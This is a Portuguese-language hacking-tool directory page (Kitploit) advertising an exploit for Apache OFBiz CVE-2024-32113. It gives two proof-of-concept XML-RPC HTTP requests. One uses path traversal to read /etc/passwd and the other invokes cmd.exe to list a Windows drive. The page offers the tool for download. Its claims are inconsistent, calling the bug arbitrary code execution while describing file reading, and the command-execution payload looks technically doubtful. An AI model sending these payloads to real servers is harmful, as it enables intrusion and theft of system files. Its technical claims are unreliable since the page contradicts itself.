Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Apache-OFBiz-Directory-Traversal-exploit — Exploit para Apache OFBiz CVE-2024-32113 de path traversal via requisições XML-RPC elaboradas, permitindo leitura arbitrária de arquivos e potencial execução de comandos em servidores vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosSegurança WebTestes de Penetração
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Exploit para Apache OFBiz CVE-2024-32113 de path traversal via requisições XML-RPC elaboradas, permitindo leitura arbitrária de arquivos e potencial execução de comandos em servidores vulneráveis.

Ver Repositório
1634há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Apache-OFBiz-Directory-Traversal-exploit

Uma vulnerabilidade classificada como crítica foi encontrada no Apache OFBiz até a versão 18.12.12. Uma funcionalidade desconhecida é afetada por esse problema. A manipulação com uma entrada desconhecida leva a uma vulnerabilidade de path traversal. O produto usa entrada externa para construir um caminho que deve identificar um arquivo ou diretório localizado sob um diretório pai restrito, mas o produto não neutraliza corretamente elementos especiais no caminho que podem fazer com que o caminho resolva para um local fora do diretório restrito. A confidencialidade, a integridade e a disponibilidade são impactadas.

Introdução

  • A vulnerabilidade CVE-2024-32113 permite a execução de código arbitrário em um servidor Apache OFBiz por meio do envio de uma solicitação HTTP especialmente criada.
  • Nesta solicitação, o atacante usa o parâmetro ../../../../../../etc/passwd para apontar para o arquivo etc/passwd no servidor Apache OFBiz.
  • Quando o servidor Apache OFBiz processa essa solicitação, ele tentará ler o arquivo etc/passwd, que contém informações sensíveis sobre os usuários do servidor.
  • Essas informações podem ser usadas para realizar ataques adicionais no servidor, como roubar dados, modificá-los ou até mesmo excluí-los.

PoC

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

OU

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
Baixar ferramenta